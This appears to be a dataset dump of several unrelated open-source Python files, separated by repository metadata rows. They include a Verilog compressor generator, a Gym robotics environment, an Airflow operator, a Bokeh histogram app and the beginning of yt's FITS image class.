        'packages_exclude': packages_exclude,
        'project_name_description': self._project_definition.name_description,
        'project_name': self._project_definition.name,
        'python3_package_files': python3_package_files,
        'rpm_doc_files': ' '.join(rpm_doc_files),
        'rpm_license_file': rpm_license_file,
        'shebang': shebang,
        'scripts_directory': scripts_directory,
    }

    # Per-project overrides of which packages carry *.yaml data.
    if self._project_definition.name in self._PROJECTS_WITH_PACKAGE_DATA:
      if self._project_definition.name == 'dfvfs':
        package_data_paths = ['dfvfs.lib']

      elif self._project_definition.name == 'plaso':
        package_data_paths = [
            'plaso.parsers', 'plaso.parsers.esedb_plugins',
            'plaso.parsers.olecf_plugins', 'plaso.parsers.plist_plugins',
            'plaso.parsers.winreg_plugins']

      elif self._project_definition.name == 'winreg-kb':
        package_data_paths = ['winregrc']

      else:
        package_data_paths = [self._project_definition.name]

      template_mappings['package_data_paths'] = ',\n'.join([
          ' \'{0:s}\': [\'*.yaml\']'.format(path)
          for path in package_data_paths])

    # Assemble the file from the template sections in order.
    file_content = []

    if scripts_directory:
      template_data = self._GenerateFromTemplate(
          'header_scripts', template_mappings)
    else:
      template_data = self._GenerateFromTemplate(
          'header', template_mappings)
    file_content.append(template_data)

    template_data = self._GenerateFromTemplate(
        'header_setuptools', template_mappings)
    file_content.append(template_data)

    if self._project_definition.name in self._PROJECTS_WITH_SDIST_TEST_DATA:
      template_data = self._GenerateFromTemplate(
          'import_sdist', template_mappings)
      file_content.append(template_data)

    for template_file in ('import_module', 'bdist_msi', 'bdist_rpm-start'):
      template_data = self._GenerateFromTemplate(
          template_file, template_mappings)
      file_content.append(template_data)

    if data_directory and scripts_directory:
      template_file = 'bdist_rpm-with_data_and_tools'
    elif data_directory:
      template_file = 'bdist_rpm-with_data'
    else:
      template_file = 'bdist_rpm'

    template_data = self._GenerateFromTemplate(template_file, template_mappings)
    file_content.append(template_data)

    template_data = self._GenerateFromTemplate(
        'setup_header', template_mappings)
    file_content.append(template_data)

    if self._project_definition.name in self._PROJECTS_WITH_SDIST_TEST_DATA:
      template_file = 'setup_cmdclass_sdist'
    else:
      template_file = 'setup_cmdclass'

    template_data = self._GenerateFromTemplate(template_file, template_mappings)
    file_content.append(template_data)

    template_data = self._GenerateFromTemplate(
        'setup_classifiers', template_mappings)
    file_content.append(template_data)

    if self._project_definition.name in self._PROJECTS_WITH_PACKAGE_DATA:
      template_data = self._GenerateFromTemplate(
          'setup_package_data', template_mappings)
      file_content.append(template_data)

    if scripts_directory:
      template_data = self._GenerateFromTemplate(
          'setup_scripts', template_mappings)
      file_content.append(template_data)

    template_data = self._GenerateFromTemplate(
        'setup_data_files', template_mappings)
    file_content.append(template_data)

    if data_directory:
      if self._project_definition.name == 'plaso':
        template_file = 'setup_data_files-with_data-plaso'
      else:
        template_file = 'setup_data_files-with_data'

      template_data = self._GenerateFromTemplate(
          template_file, template_mappings)
      file_content.append(template_data)

    template_data = self._GenerateFromTemplate(
        'setup_footer', template_mappings)
    file_content.append(template_data)

    file_content = ''.join(file_content)

    with io.open(self.PATH, 'w', encoding='utf-8') as file_object:
      file_object.write(file_content)
| 34.910714 | 80 | 0.690829 |
0f47cad4e6dba73f381706d7a2d2c8aa833f96b5 | 4,917 | py | Python | third_party/tests/BlackParrot/external/basejump_stl/hard/tsmc_40/bsg_misc/bsg_mul/bsg_comp42_gen.py | bsp13/Surelog | 3a04f7f59791390c69f1e3b69609db4ede7668b9 | [
"Apache-2.0"
] | 3 | 2021-05-12T21:57:55.000Z | 2021-07-29T19:56:04.000Z | third_party/tests/BlackParrot/external/basejump_stl/hard/tsmc_40/bsg_misc/bsg_mul/bsg_comp42_gen.py | bsp13/Surelog | 3a04f7f59791390c69f1e3b69609db4ede7668b9 | [
"Apache-2.0"
] | 2 | 2020-05-13T06:06:49.000Z | 2020-05-15T10:49:11.000Z | third_party/tests/BlackParrot/external/basejump_stl/hard/tsmc_40/bsg_misc/bsg_mul/bsg_comp42_gen.py | bsp13/Surelog | 3a04f7f59791390c69f1e3b69609db4ede7668b9 | [
"Apache-2.0"
] | 2 | 2020-05-01T08:33:19.000Z | 2021-07-29T19:56:12.000Z | #!/usr/bin/python
#
# bsg_comp42_gen < number of rows of 4:2 compressors >
#
#
#
# This script generates sections of 42: compressors for
# multipliers. (See Computer Arthmetic Google Doc.)
#
#
#
#
import sys;
def emit_module_header (name, input_args, output_args) :
    # Print a Verilog module header with one declaration per port.
    # input_args/output_args are strings like "name" or "[range] name".
    print "module " + name + " (",
    my_list = []
    for x in input_args :
        my_list.append("input "+x+"\n");
    for x in output_args :
        my_list.append("output "+x+"\n");
    # Indent continuation lines under the module name; ports are
    # separated by commas.
    print (" "*(len(name)+8)+",").join(my_list);
    print ");";
def emit_module_footer( ) :
    # Close the current Verilog module.
    print "endmodule";

def emit_wire_definition (name) :
    # Print a wire declaration on its own line.
    print "wire " + name + "; "

def emit_wire_definition_nocr (name) :
    # Same as emit_wire_definition but the trailing comma suppresses the
    # newline (Python 2 print semantics).
    print "wire " + name + "; ",

def emit_gate_instance (gate_str, arg_list ) :
    # Fill the #N placeholders in gate_str and print the instance.
    print gate_instance(gate_str,arg_list);
def queue_gate_instance(out_dict, gate_str, arg_list, order):
    """Render a gate instance and queue it in *out_dict* keyed by its text.

    The placement order is stored as the value so callers can later emit
    the queued instances in a chosen sequence.
    """
    out_dict[gate_instance(gate_str, arg_list)] = order

def gate_instance(gate_str, arg_list):
    """Substitute positional placeholders #0, #1, ... in a gate template.

    Placeholder #i is replaced by arg_list[i]; the filled-in instance
    string is returned.
    """
    for index, argument in enumerate(arg_list):
        gate_str = gate_str.replace("#" + str(index), argument)
    return gate_str
def access_bit(name, bit):
    # Render a Verilog single-bit select, e.g. ("s_o", 3) -> "s_o[3]".
    return "".join([name, "[", str(bit), "]"])
def access_2D_bit(name, word, bit, rows):
    # Flatten a 2-D [word][bit] index into the 1-D input bus "i", appending
    # the original 2-D index as a Verilog comment.  Only "i" is supported.
    if name != "i":
        return "error"
    flat = word * rows + bit
    annot = "/*" + name + "[" + str(word) + "][" + str(bit) + "]" + "*/"
    return name + "[" + str(flat) + "]" + annot
def access_3D_bit(name, dof, word, bit):
    # Flatten a 3-D [dof][word][bit] index into the 1-D "y_vec_i" bus
    # (4 words per dof, 2 bits per word), appending the original index as a
    # Verilog comment.  Any other bus name is unsupported.
    if name != "y_vec_i":
        return "error"
    words_per_dof = 4
    bits_per_word = 2
    flat = bits_per_word * (dof * words_per_dof + word) + bit
    annot = "/*" + name + "[" + str(dof) + "][" + str(word) + "][" + str(bit) + "]" + "*/"
    return name + "[" + str(flat) + "] " + annot
def param_bits_all(name, bit):
    # Render a Verilog packed-range declaration, e.g. ("i", 8) -> "[7:0] i".
    return "[%s:0] %s" % (bit - 1, name)
def param_bits_2D_all(name, words, bit):
    # Render a 2-D packed-range declaration, e.g. ("i", 4, 8) -> "[3:0][7:0] i".
    return "[%s:0][%s:0] %s" % (words - 1, bit - 1, name)
def param_bits_3D_all(name, words, bit, zop):
    # Render a 3-D packed-range declaration,
    # e.g. ("y", 4, 2, 3) -> "[3:0][1:0][2:0] y".
    return "[%s:0][%s:0][%s:0] %s" % (words - 1, bit - 1, zop - 1, name)
def ident_name_word_bit(name, word, bit):
    # Build a unique identifier tagged with word and bit indices.
    return "%s_w%s_b%s" % (name, word, bit)
def ident_name_bit_port(name, bit, port):
    # Build a unique identifier tagged with bit and port indices.
    return "%s_b%s_p%s" % (name, bit, port)
def ident_name_word_bit_port(name, word, bit, port):
    # Build a unique identifier tagged with word, bit, and port indices.
    return "%s_w%s_b%s_p%s" % (name, word, bit, port)
def ident_name_bit(name, bit):
    # Build a unique identifier tagged with a bit index.
    return "%s_b%s" % (name, bit)
def emit_rp_group_begin (name) :
    # Open a Synopsys relative-placement group directive comment.
    print "// synopsys rp_group (" + name + ")"
def emit_rp_group_end (name) :
    # Close a Synopsys relative-placement group directive comment.
    print "// synopsys rp_endgroup (" + name +")"
def emit_rp_fill (params):
    # Emit a Synopsys rp_fill placement directive; *params* is the
    # pre-formatted "<col> <row> <pattern>" parameter string.
    print "// synopsys rp_fill (" + params +")"
# NOTE: for symmetric pins, assume that earlier ones are always faster.
# For example, for AOI22 A's are faster than B's and A0 is faster than A1.
#
fab = "tsmc_40"
aoi22 = "AOI22X1 #0 (.A0(#1), .A1(#2), .B0(#3), .B1(#4), .Y(#5) );"
xnor2 = "XNOR2X1 #0 (.A (#1), .B (#2), .Y (#3) );"
addf = "ADDFHX1 #0 (.A (#1), .B (#2), .CI (#3), .S(#4), .CO(#5) );"
#
# CSA
# CSA
#
def generate_c42_block ( rows ) :
    # Emit a Verilog module implementing a column of *rows* 4:2 compressors,
    # each built from two full-adder (ADDF) cells, with Synopsys relative
    # placement directives laying the cells out in a single column.
    module_name = ident_name_bit("bsg_rp_"+fab+"_comp42_block",rows);
    # Ports: flattened 4 x rows input bus "i" and carry-in "cr_i";
    # outputs: carry-left "cl_o", carry vector "c_o", sum vector "s_o".
    emit_module_header (module_name
        , [ param_bits_all("i",4*rows) + " /*" + param_bits_2D_all("i",4,rows)+ "*/"
        , "cr_i"
        ]
        , [ "cl_o", param_bits_all("c_o",rows), param_bits_all("s_o",rows)]
        );
    column = 0
    emit_rp_group_begin("c42")
    for pos in range (0,rows) :
        print ""
        # Internal sum and intra-column carry wires for this bit position.
        print "wire " + ident_name_bit("s_int",pos) +";";
        print "wire " + ident_name_bit("cl_int",pos)+";";
        emit_rp_fill("0 " + str(pos*2) + " UX");
        # First full adder: compresses i[3][pos], i[2][pos], i[1][pos]; its
        # carry feeds the next row up (or cl_o at the topmost row).
        emit_gate_instance(addf
            , [ ident_name_word_bit("add42", pos, 0)
            , access_2D_bit("i", 3, pos, rows)
            , access_2D_bit("i", 2, pos, rows)
            , access_2D_bit("i", 1, pos, rows)
            , ident_name_bit("s_int", pos)
            , "cl_o" if (pos == rows-1) else ident_name_bit("cl_int",pos)
            ]);
        # Second full adder: combines i[0][pos], the intermediate sum, and
        # the carry from the previous row (or cr_i at the bottom row).
        emit_gate_instance(addf
            , [ ident_name_word_bit("add42", pos, 1)
            , access_2D_bit("i", 0, pos, rows)
            , ident_name_bit("s_int", pos)
            , ident_name_bit("cl_int" ,pos-1) if (pos > 0) else "cr_i"
            , access_bit("s_o", pos)
            , access_bit("c_o", pos)
            ]);
    emit_rp_group_end("c42")
    emit_module_footer()
# Command-line entry point: the single argument is the number of 4:2
# compressor rows to generate.
if len(sys.argv) == 2 :
    generate_c42_block (int(sys.argv[1]));
else :
    print "Usage: " + sys.argv[0] + " rows";
| 30.351852 | 145 | 0.517999 |
0cd3c76b3b0d8abe62060fc7e39556b16496afe6 | 304 | py | Python | 2017/04/bidi-bidi-refugee-camp-overview-20170313/graphic_config.py | nprapps/graphics-archive | 97b0ef326b46a959df930f5522d325e537f7a655 | [
"FSFAP"
] | 14 | 2015-05-08T13:41:51.000Z | 2021-02-24T12:34:55.000Z | 2017/04/bidi-bidi-refugee-camp-overview-20170313/graphic_config.py | nprapps/graphics-archive | 97b0ef326b46a959df930f5522d325e537f7a655 | [
"FSFAP"
] | null | null | null | 2017/04/bidi-bidi-refugee-camp-overview-20170313/graphic_config.py | nprapps/graphics-archive | 97b0ef326b46a959df930f5522d325e537f7a655 | [
"FSFAP"
] | 7 | 2015-04-04T04:45:54.000Z | 2021-02-18T11:12:48.000Z | #!/usr/bin/env python
import base_filters
COPY_GOOGLE_DOC_KEY = '1njqSO2c0DSdSy6FRZN0iRGTUX424B-u2DkyRt-93RM8'
USE_ASSETS = True
# Use these variables to override the default cache timeouts for this graphic
# DEFAULT_MAX_AGE = 20
# ASSETS_MAX_AGE = 300
JINJA_FILTER_FUNCTIONS = base_filters.FILTERS
| 21.714286 | 77 | 0.8125 |
2a0b0ae144728342a6eb718da94bef2e3f94e519 | 872 | py | Python | gym/envs/robotics/fetch/pick_and_place.py | LBJ-Wade/gym | c0286e25265582ae9b4ef89942780588ae0f0394 | [
"Python-2.0",
"OLDAP-2.7"
] | 32 | 2018-08-26T15:39:07.000Z | 2021-12-09T03:53:49.000Z | gym/envs/robotics/fetch/pick_and_place.py | LBJ-Wade/gym | c0286e25265582ae9b4ef89942780588ae0f0394 | [
"Python-2.0",
"OLDAP-2.7"
] | 1 | 2020-09-08T02:19:05.000Z | 2020-11-02T03:43:29.000Z | gym/envs/robotics/fetch/pick_and_place.py | LBJ-Wade/gym | c0286e25265582ae9b4ef89942780588ae0f0394 | [
"Python-2.0",
"OLDAP-2.7"
] | 8 | 2018-11-19T19:51:43.000Z | 2021-12-07T20:08:52.000Z | from gym import utils
from gym.envs.robotics import fetch_env
class FetchPickAndPlaceEnv(fetch_env.FetchEnv, utils.EzPickle):
    """Fetch pick-and-place task environment with the standard setup."""

    def __init__(self, reward_type='sparse'):
        # Initial generalized coordinates: robot/table slide joints plus the
        # free object's pose (position + unit quaternion).
        start_qpos = {
            'robot0:slide0': 0.405,
            'robot0:slide1': 0.48,
            'robot0:slide2': 0.0,
            'table0:slide0': 1.05,
            'table0:slide1': 0.4,
            'table0:slide2': 0.0,
            'object0:joint': [1.25, 0.53, 0.4, 1., 0., 0., 0.],
        }
        fetch_env.FetchEnv.__init__(
            self, 'fetch/pick_and_place.xml', has_object=True,
            block_gripper=False, n_substeps=20, gripper_extra_height=0.2,
            target_in_the_air=True, target_offset=0.0, obj_range=0.15,
            target_range=0.15, distance_threshold=0.05,
            initial_qpos=start_qpos, reward_type=reward_type)
        utils.EzPickle.__init__(self)
| 39.636364 | 98 | 0.613532 |
ef6549c6ea2d3717f09974c9175cfd35fc120fb0 | 347 | py | Python | dnsmanager/views.py | erdnaxe/django-dnsmanager | 5c00c8f6ca98678d5e8f02243622419f602d4daa | [
"BSD-3-Clause"
] | 8 | 2019-12-21T10:07:49.000Z | 2021-08-27T23:51:54.000Z | dnsmanager/views.py | constellation-project/django-dnsmanager | 5c00c8f6ca98678d5e8f02243622419f602d4daa | [
"BSD-3-Clause"
] | 6 | 2019-12-21T09:45:14.000Z | 2021-03-27T10:14:28.000Z | dnsmanager/views.py | constellation-project/django-dnsmanager | 5c00c8f6ca98678d5e8f02243622419f602d4daa | [
"BSD-3-Clause"
] | 3 | 2020-07-19T23:15:53.000Z | 2021-03-26T19:00:20.000Z | from django.contrib.auth.mixins import PermissionRequiredMixin
from django.views.generic.detail import DetailView
from .models import Zone
class ZoneDetailView(PermissionRequiredMixin, DetailView):
"""
This view generates a zone file
"""
permission_required = ('dnsmanager.view_zone', 'dnsmanager.view_record')
model = Zone
| 26.692308 | 76 | 0.766571 |
6b6c82c1482afa96b54acfa35e5431bf0ff37b5c | 2,696 | py | Python | airflow/operators/latest_only_operator.py | IGIT-CN/airflow | a6e5bcd59198afe5716813e84ebc4c59eade532c | [
"Apache-2.0"
] | 8 | 2017-04-20T16:15:44.000Z | 2020-10-11T13:44:10.000Z | airflow/operators/latest_only_operator.py | IGIT-CN/airflow | a6e5bcd59198afe5716813e84ebc4c59eade532c | [
"Apache-2.0"
] | 219 | 2017-03-15T18:40:16.000Z | 2022-02-28T22:52:43.000Z | airflow/operators/latest_only_operator.py | IGIT-CN/airflow | a6e5bcd59198afe5716813e84ebc4c59eade532c | [
"Apache-2.0"
] | 3 | 2016-07-14T21:51:10.000Z | 2020-10-12T13:26:36.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
This module contains an operator to run downstream tasks only for the
latest scheduled DagRun
"""
from typing import Dict, Iterable, Union
import pendulum
from airflow.operators.branch_operator import BaseBranchOperator
class LatestOnlyOperator(BaseBranchOperator):
    """
    Allows a workflow to skip tasks that are not running during the most
    recent schedule interval.

    If the task runs outside the latest schedule interval (the interval
    immediately following this DagRun's execution_date), all directly
    downstream tasks will be skipped.

    Note that downstream tasks are never skipped if the given DAG_Run is
    marked as externally triggered.
    """

    ui_color = '#e9ffdb'  # nyanza

    def choose_branch(self, context: Dict) -> Union[str, Iterable[str]]:
        """Return the downstream task ids to follow (empty means skip all)."""
        # Externally triggered runs are never skipped: follow every directly
        # downstream task.
        if context['dag_run'] and context['dag_run'].external_trigger:
            self.log.info(
                "Externally triggered DAG_Run: allowing execution to proceed.")
            return context['task'].get_direct_relative_ids(upstream=False)

        # The "latest" window is (following_schedule(execution_date),
        # following_schedule of that]; this run is latest iff now falls in it.
        now = pendulum.utcnow()
        left_window = context['dag'].following_schedule(
            context['execution_date'])
        right_window = context['dag'].following_schedule(left_window)

        self.log.info(
            'Checking latest only with left_window: %s right_window: %s now: %s',
            left_window, right_window, now
        )

        if not left_window < now <= right_window:
            self.log.info('Not latest execution, skipping downstream.')
            # An empty list selects no downstream task, so the parent
            # BaseBranchOperator skips all of them.
            return []
        else:
            self.log.info('Latest, allowing execution to proceed.')
            return context['task'].get_direct_relative_ids(upstream=False)
| 39.647059 | 87 | 0.704006 |
2cfe8f5665efc1c5f023cbb1f5554354a7fee5a7 | 332 | py | Python | pajson/example.py | DreeGall/pajson | ff35962feee98f37ada6f10348012945c665297b | [
"MIT"
] | null | null | null | pajson/example.py | DreeGall/pajson | ff35962feee98f37ada6f10348012945c665297b | [
"MIT"
] | null | null | null | pajson/example.py | DreeGall/pajson | ff35962feee98f37ada6f10348012945c665297b | [
"MIT"
] | null | null | null | """Example of code."""
def hello(name: str) -> str:
    """Build a greeting message for *name*.

    Args:
        name (str): Name to greet.

    Returns:
        str: greeting message

    Examples:
        .. code:: python

            >>> hello("Roman")
            'Hello Roman!'
    """
    return "Hello {}!".format(name)
| 16.6 | 35 | 0.463855 |
54717be602c0abc4af7a989878b806cc212e6f1f | 3,725 | py | Python | bokehdash/BokehApps/selection_histogram.py | longtailfinancial/BokehDjango | 6e4a014f7e54edcb129ca38b28692bd2e374bdfd | [
"MIT"
] | 49 | 2017-11-08T18:54:19.000Z | 2021-11-16T12:34:16.000Z | bokehdash/BokehApps/selection_histogram.py | longtailfinancial/BokehDjango | 6e4a014f7e54edcb129ca38b28692bd2e374bdfd | [
"MIT"
] | null | null | null | bokehdash/BokehApps/selection_histogram.py | longtailfinancial/BokehDjango | 6e4a014f7e54edcb129ca38b28692bd2e374bdfd | [
"MIT"
] | 16 | 2017-11-14T12:53:51.000Z | 2021-08-07T22:48:16.000Z | ''' Present a scatter plot with linked histograms on both axes.
Use the ``bokeh serve`` command to run the example by executing:
bokeh serve selection_histogram.py
at your command prompt. Then navigate to the URL
http://localhost:5006/selection_histogram
in your browser.
'''
import numpy as np
from bokeh.layouts import row, column
from bokeh.models import BoxSelectTool, LassoSelectTool, Spacer
from bokeh.plotting import figure, curdoc
# create three normal population samples with different parameters
x1 = np.random.normal(loc=5.0, size=400) * 100
y1 = np.random.normal(loc=10.0, size=400) * 10
x2 = np.random.normal(loc=5.0, size=800) * 50
y2 = np.random.normal(loc=5.0, size=800) * 10
x3 = np.random.normal(loc=55.0, size=200) * 10
y3 = np.random.normal(loc=4.0, size=200) * 10
x = np.concatenate((x1, x2, x3))
y = np.concatenate((y1, y2, y3))
TOOLS="pan,wheel_zoom,box_select,lasso_select,reset"
# create the scatter plot
p = figure(tools=TOOLS, plot_width=600, plot_height=600, min_border=10, min_border_left=50,
toolbar_location="above", x_axis_location=None, y_axis_location=None,
title="Linked Histograms")
p.background_fill_color = "#fafafa"
p.select(BoxSelectTool).select_every_mousemove = False
p.select(LassoSelectTool).select_every_mousemove = False
r = p.scatter(x, y, size=3, color="#3A5785", alpha=0.6)
# create the horizontal histogram
hhist, hedges = np.histogram(x, bins=20)
hzeros = np.zeros(len(hedges)-1)
hmax = max(hhist)*1.1
LINE_ARGS = dict(color="#3A5785", line_color=None)
ph = figure(toolbar_location=None, plot_width=p.plot_width, plot_height=200, x_range=p.x_range,
y_range=(-hmax, hmax), min_border=10, min_border_left=50, y_axis_location="right")
ph.xgrid.grid_line_color = None
ph.yaxis.major_label_orientation = np.pi/4
ph.background_fill_color = "#fafafa"
ph.quad(bottom=0, left=hedges[:-1], right=hedges[1:], top=hhist, color="white", line_color="#3A5785")
hh1 = ph.quad(bottom=0, left=hedges[:-1], right=hedges[1:], top=hzeros, alpha=0.5, **LINE_ARGS)
hh2 = ph.quad(bottom=0, left=hedges[:-1], right=hedges[1:], top=hzeros, alpha=0.1, **LINE_ARGS)
# create the vertical histogram
vhist, vedges = np.histogram(y, bins=20)
vzeros = np.zeros(len(vedges)-1)
vmax = max(vhist)*1.1
pv = figure(toolbar_location=None, plot_width=200, plot_height=p.plot_height, x_range=(-vmax, vmax),
y_range=p.y_range, min_border=10, y_axis_location="right")
pv.ygrid.grid_line_color = None
pv.xaxis.major_label_orientation = np.pi/4
pv.background_fill_color = "#fafafa"
pv.quad(left=0, bottom=vedges[:-1], top=vedges[1:], right=vhist, color="white", line_color="#3A5785")
vh1 = pv.quad(left=0, bottom=vedges[:-1], top=vedges[1:], right=vzeros, alpha=0.5, **LINE_ARGS)
vh2 = pv.quad(left=0, bottom=vedges[:-1], top=vedges[1:], right=vzeros, alpha=0.1, **LINE_ARGS)
layout = column(row(p, pv), row(ph, Spacer(width=200, height=200)))
curdoc().add_root(layout)
curdoc().title = "Selection Histogram"
def update(attr, old, new):
    # Bokeh selection callback: recompute the two overlay histograms for the
    # selected and unselected point subsets, and push them into the glyph
    # data sources (negated values draw the mirrored bottom/left bars).
    inds = np.array(new['1d']['indices'])
    if len(inds) == 0 or len(inds) == len(x):
        # Nothing (or everything) selected: blank both overlays.
        hhist1, hhist2 = hzeros, hzeros
        vhist1, vhist2 = vzeros, vzeros
    else:
        # Boolean mask of the *unselected* points.
        # FIX: np.bool was a deprecated alias of the builtin bool and was
        # removed in NumPy 1.24; use the builtin directly.
        neg_inds = np.ones_like(x, dtype=bool)
        neg_inds[inds] = False
        hhist1, _ = np.histogram(x[inds], bins=hedges)
        vhist1, _ = np.histogram(y[inds], bins=vedges)
        hhist2, _ = np.histogram(x[neg_inds], bins=hedges)
        vhist2, _ = np.histogram(y[neg_inds], bins=vedges)

    hh1.data_source.data["top"] = hhist1
    hh2.data_source.data["top"] = -hhist2
    vh1.data_source.data["right"] = vhist1
    vh2.data_source.data["right"] = -vhist2
r.data_source.on_change('selected', update) | 39.210526 | 101 | 0.70443 |
c122a15f2ece0b2d3c7db2d611d74b2011b29bce | 583 | py | Python | django/amazon_price_tracker/core/permissions.py | PiochU19/amazon-price-tracker | 93a321d5799ee2b0b02487fea5577698a6da8aa3 | [
"MIT"
] | null | null | null | django/amazon_price_tracker/core/permissions.py | PiochU19/amazon-price-tracker | 93a321d5799ee2b0b02487fea5577698a6da8aa3 | [
"MIT"
] | 1 | 2021-06-10T22:05:12.000Z | 2021-06-10T22:05:12.000Z | django/amazon_price_tracker/core/permissions.py | PiochU19/amazon_price_tracker | 93a321d5799ee2b0b02487fea5577698a6da8aa3 | [
"MIT"
] | 1 | 2022-01-09T03:23:19.000Z | 2022-01-09T03:23:19.000Z | from rest_framework.permissions import BasePermission
class IsObjectOwner(BasePermission):
    """
    Permission class granting access only to authenticated users and, at
    the object level, only to the owner of the object being accessed.
    """

    def has_permission(self, request, view):
        # View-level gate: a user must be present and logged in.
        user = request.user
        return user and user.is_authenticated

    def has_object_permission(self, request, view, obj):
        # Object-level gate: the object's owner must be the requester.
        return obj.user == request.user
| 22.423077 | 61 | 0.634648 |
2ca350477bbb3305a4058c400a94b87b7445388d | 37,905 | py | Python | yt/visualization/fits_image.py | saethlin/yt | 992ae71974dca933346e91008c5a50f43a0a350e | [
"BSD-3-Clause-Clear"
] | null | null | null | yt/visualization/fits_image.py | saethlin/yt | 992ae71974dca933346e91008c5a50f43a0a350e | [
"BSD-3-Clause-Clear"
] | 2 | 2020-02-10T22:55:35.000Z | 2020-02-19T21:01:20.000Z | yt/visualization/fits_image.py | saethlin/yt | 992ae71974dca933346e91008c5a50f43a0a350e | [
"BSD-3-Clause-Clear"
] | null | null | null | """
FITSImageData Class
"""
#-----------------------------------------------------------------------------
# Copyright (c) 2013, yt Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
from yt.extern.six import string_types
import numpy as np
from yt.fields.derived_field import DerivedField
from yt.funcs import mylog, iterable, fix_axis, ensure_list, \
issue_deprecation_warning
from yt.visualization.fixed_resolution import FixedResolutionBuffer
from yt.data_objects.construction_data_containers import YTCoveringGrid
from yt.utilities.on_demand_imports import _astropy
from yt.units.yt_array import YTQuantity, YTArray
from yt.units import dimensions
from yt.utilities.parallel_tools.parallel_analysis_interface import \
parallel_root_only
from yt.visualization.volume_rendering.off_axis_projection import off_axis_projection
import re
import sys
class UnitfulHDU(object):
    """Thin wrapper around a FITS image HDU that attaches yt units."""

    def __init__(self, hdu):
        self.hdu = hdu
        self.header = hdu.header
        # Field name and unit string come from the FITS header cards.
        self.name = self.header["BTYPE"]
        self.units = self.header["BUNIT"]
        self.shape = hdu.shape

    @property
    def data(self):
        # Wrap the raw HDU array in a YTArray carrying the header units.
        return YTArray(self.hdu.data, self.units)

    def __repr__(self):
        dims = " x ".join(str(axis) for axis in self.shape)
        return "FITSImage: %s (%s, %s)" % (self.name, dims, self.units)
class FITSImageData(object):
def __init__(self, data, fields=None, units=None, width=None, wcs=None):
r""" Initialize a FITSImageData object.
FITSImageData contains a collection of FITS ImageHDU instances and
WCS information, along with units for each of the images. FITSImageData
instances can be constructed from ImageArrays, NumPy arrays, dicts
of such arrays, FixedResolutionBuffers, and YTCoveringGrids. The latter
two are the most powerful because WCS information can be constructed
automatically from their coordinates.
Parameters
----------
data : FixedResolutionBuffer or a YTCoveringGrid. Or, an
ImageArray, an numpy.ndarray, or dict of such arrays
The data to be made into a FITS image or images.
fields : single string or list of strings, optional
The field names for the data. If *fields* is none and *data* has
keys, it will use these for the fields. If *data* is just a
single array one field name must be specified.
units : string
The units of the WCS coordinates. Defaults to "cm".
width : float or YTQuantity
The width of the image. Either a single value or iterable of values.
If a float, assumed to be in *units*. Only used if this information
is not already provided by *data*.
wcs : `astropy.wcs.WCS` instance, optional
Supply an AstroPy WCS instance. Will override automatic WCS
creation from FixedResolutionBuffers and YTCoveringGrids.
Examples
--------
>>> # This example uses a FRB.
>>> ds = load("sloshing_nomag2_hdf5_plt_cnt_0150")
>>> prj = ds.proj(2, "kT", weight_field="density")
>>> frb = prj.to_frb((0.5, "Mpc"), 800)
>>> # This example just uses the FRB and puts the coords in kpc.
>>> f_kpc = FITSImageData(frb, fields="kT", units="kpc")
>>> # This example specifies a specific WCS.
>>> from astropy.wcs import WCS
>>> w = WCS(naxis=self.dimensionality)
>>> w.wcs.crval = [30., 45.] # RA, Dec in degrees
>>> w.wcs.cunit = ["deg"]*2
>>> nx, ny = 800, 800
>>> w.wcs.crpix = [0.5*(nx+1), 0.5*(ny+1)]
>>> w.wcs.ctype = ["RA---TAN","DEC--TAN"]
>>> scale = 1./3600. # One arcsec per pixel
>>> w.wcs.cdelt = [-scale, scale]
>>> f_deg = FITSImageData(frb, fields="kT", wcs=w)
>>> f_deg.writeto("temp.fits")
"""
self.fields = []
self.field_units = {}
if units is None:
units = "cm"
if width is None:
width = 1.0
exclude_fields = ['x','y','z','px','py','pz',
'pdx','pdy','pdz','weight_field']
if isinstance(data, _astropy.pyfits.HDUList):
self.hdulist = data
for hdu in data:
self.fields.append(hdu.header["btype"])
self.field_units[hdu.header["btype"]] = hdu.header['bunit']
self.shape = self.hdulist[0].shape
self.dimensionality = len(self.shape)
wcs_names = [key for key in self.hdulist[0].header
if "WCSNAME" in key]
for name in wcs_names:
if name == "WCSNAME":
key = ' '
else:
key = name[-1]
w = _astropy.pywcs.WCS(header=self.hdulist[0].header,
key=key, naxis=self.dimensionality)
setattr(self, "wcs"+key.strip().lower(), w)
return
self.hdulist = _astropy.pyfits.HDUList()
if isinstance(fields, string_types):
fields = [fields]
if hasattr(data, 'keys'):
img_data = data
if fields is None:
fields = list(img_data.keys())
elif isinstance(data, np.ndarray):
if fields is None:
mylog.warning("No field name given for this array. "
"Calling it 'image_data'.")
fn = 'image_data'
fields = [fn]
else:
fn = fields[0]
img_data = {fn: data}
for fd in fields:
if isinstance(fd, tuple):
self.fields.append(fd[1])
elif isinstance(fd, DerivedField):
self.fields.append(fd.name[1])
else:
self.fields.append(fd)
first = True
for name, field in zip(self.fields, fields):
if name not in exclude_fields:
if hasattr(img_data[field], "units"):
self.field_units[name] = str(img_data[field].units)
else:
self.field_units[name] = "dimensionless"
mylog.info("Making a FITS image of field %s" % name)
if first:
hdu = _astropy.pyfits.PrimaryHDU(np.array(img_data[field]))
first = False
else:
hdu = _astropy.pyfits.ImageHDU(np.array(img_data[field]))
hdu.name = name
hdu.header["btype"] = name
hdu.header["bunit"] = re.sub('()', '', self.field_units[name])
self.hdulist.append(hdu)
self.shape = self.hdulist[0].shape
self.dimensionality = len(self.shape)
if wcs is None:
w = _astropy.pywcs.WCS(header=self.hdulist[0].header,
naxis=self.dimensionality)
if isinstance(img_data, FixedResolutionBuffer):
# FRBs are a special case where we have coordinate
# information, so we take advantage of this and
# construct the WCS object
dx = (img_data.bounds[1]-img_data.bounds[0]).to(units).v
dy = (img_data.bounds[3]-img_data.bounds[2]).to(units).v
dx /= self.shape[0]
dy /= self.shape[1]
